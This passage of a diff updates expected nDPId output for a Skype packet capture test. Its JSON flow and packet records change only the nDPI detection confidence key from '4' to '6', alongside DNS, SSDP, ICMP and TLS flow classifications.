00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":2,"flow_last_seen":1431969695778,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969695778,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGxIZv3U2OwKgBIpxXw6bHcDhRFXPe\/aASOJD2ggAAAgQFrAQCCApNjF\/4PiNZ1AEDAwk="} 
@@ -743,14 +743,14 @@ 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1346,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1431969698508,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1431969698508,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAABIoEQAAEARVbXAqAFcwKgB\/+EV4RUANFGUU3BvdFVkcDB5FYpWEIvHwwABAARIlcIDhMAbG8d8ZX7RWey9o+VAQ2IEJyw="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1352,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969698743,"flow_last_seen":1431969698743,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431969698743,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1352,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1431969698743,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431969698743,"pkt":"0NQSxnP1PBXCt3IOCABFAABEy5wAAEARK5nAqAEiwKgBAfdZADUAMBpr\/I4BAAABAAAAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAQ=="} 
-00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1352,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969698743,"flow_last_seen":1431969698743,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431969698743,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1352,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969698743,"flow_last_seen":1431969698743,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431969698743,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1353,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":2,"flow_last_seen":1431969698797,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1431969698797,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA191kAQKAy\/I6BgAABAAEAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAABAABBfOIaY="} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1353,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969698743,"flow_last_seen":1431969698797,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969698797,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1353,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969698743,"flow_last_seen":1431969698797,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969698797,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": 
{"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1354,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969698797,"flow_last_seen":1431969698797,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969698797,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1354,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1431969698797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969698797,"pkt":"0NQSxnP1PBXCt3IOCABFAABASetAAEAG9Y7AqAEiF84hpsOqAbtGC\/RmAAAAALAC\/\/+XCwAAAgQFtAEDAwUBAQgKPiNmuAAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1355,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":2,"flow_last_seen":1431969698840,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969698840,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7w6oZSGV1Rgv0Z6ASOJDhugAAAgQFrAQCCArsLyLPPiNmuAEDAwU="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1356,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":3,"flow_last_seen":1431969698840,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969698840,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ZSJAAEAG2mPAqAEiF84hpsOqAbtGC\/RnGUhldoAQECw4twAAAQEICj4jZuLsLyLP"} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1357,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969698797,"flow_last_seen":1431969698841,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1431969698841,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50090,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"apps.skype.com","ja3":"3d49c0a7161d6636fcb6973f14e05046","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1357,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969698797,"flow_last_seen":1431969698841,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1431969698841,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50090,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"apps.skype.com","ja3":"3d49c0a7161d6636fcb6973f14e05046","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1358,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969699142,"flow_last_seen":1431969699142,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969699142,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1358,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1431969699142,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969699142,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQstAAEAGrVjAqAEinTfrksOrAbuMrH5PAAAAALAC\/\/911AAAAgQFtAEDAwUBAQgKPiNoDgAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1360,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":2,"flow_last_seen":1431969699217,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969699217,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iedN+uSwKgBIgG7w6sASTQ1jKx+UKASOJCu2QAAAgQFrAQCCApMXR6HPiNoDgEDAwk="} 
@@ -801,17 +801,17 @@ 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1590,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":3,"flow_last_seen":1431969711097,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969711097,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0CpBAAEAGnRXAqAEinTg0HMO8nEnrI3U0Hv\/4VYAQECx2mwAAAQEICj4jloNMXGQg"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1616,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":49485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1616,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1431969712913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1431969712913,"pkt":"AQBef\/\/6PBXCt3IOCABFAAChlVQAAAERcjPAqAEi7\/\/\/+sFNB2wAjXH\/TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOUFBQQ29ubmVjdGlvbjoxDQoNCg=="} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1616,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":49485,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1616,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":49485,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1617,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":2,"flow_last_seen":1431969712913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1431969712913,"pkt":"AQBef\/\/6PBXCt3IOCABFAACgzegAAAEROaDAqAEi7\/\/\/+sFNB2wAjNfyTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOSVBDb25uZWN0aW9uOjENCg0K"} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1618,"source":"skype.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":51066,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00622{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1618,"source":"skype.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1431969712913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1431969712913,"pkt":"AQBef\/\/6PBXCt3IOCABFAAChxxoAAAERQG3AqAEi7\/\/\/+sd6B2wAjWvSTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOUFBQQ29ubmVjdGlvbjoxDQoNCg=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1618,"source":"skype.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":51066,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1618,"source":"skype.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":51066,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1619,"source":"skype.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":2,"flow_last_seen":1431969712913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1431969712913,"pkt":"AQBef\/\/6PBXCt3IOCABFAACgMZsAAAER1e3AqAEi7\/\/\/+sd6B2wAjNHFTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOSVBDb25uZWN0aW9uOjENCg0K"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1620,"source":"skype.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54067,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1620,"source":"skype.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1431969712913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969712913,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoiaEAAEARbbDAqAEiwKgBAdMzFOcAFCBsAAEAADLdMt0AAA4Q"} 00548{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1621,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712918,"flow_last_seen":1431969712918,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969712918,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1621,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1431969712918,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431969712918,"pkt":"PBXCt3IO0NQSxnP1CABFwABEBYEAAEAB8QTAqAEBwKgBIgMDgJYAAAAARQAAKImhAABAEW2wwKgBIsCoAQHTMxTnABQgbAABAAAy3TLdAAAOEA=="} 
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1621,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712918,"flow_last_seen":1431969712918,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969712918,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.041447} +00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1621,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712918,"flow_last_seen":1431969712918,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969712918,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.041447} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1623,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712931,"flow_last_seen":1431969712931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969712931,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50109,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1623,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1431969712931,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969712931,"pkt":"0NQSxnP1PBXCt3IOCABFAABAK1RAAEAGGV7AqAEiW77YfcO9MD57jsMsAAAAALAC\/\/8yeAAAAgQFtAEDAwUBAQgKPiOdpAAAAAAEAgAA"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1624,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":2,"flow_last_seen":1431969712980,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969712980,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0xLRAAPUGywBbvth9wKgBIjA+w71YjgIOe47DLYASH\/7LvwAAAgQFoAEDAwQBAQQC"} 
@@ -827,28 +827,28 @@ 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1666,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":3,"flow_last_seen":1431969713779,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969713779,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoL3hAAEAGFVLAqAEiW77YfcO+MD4D6993vOs\/Q1AQIADGPwAA"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1669,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.26.55.167","src_port":13021,"dst_port":63773,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1669,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1431969713813,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969713813,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuRSsAAEARjAjAqAEisBo3pzLd+R0AGvy6nPQCqlUgKb9nOC7NdHVpaZsV"} 
-00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.26.55.167","src_port":13021,"dst_port":63773,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 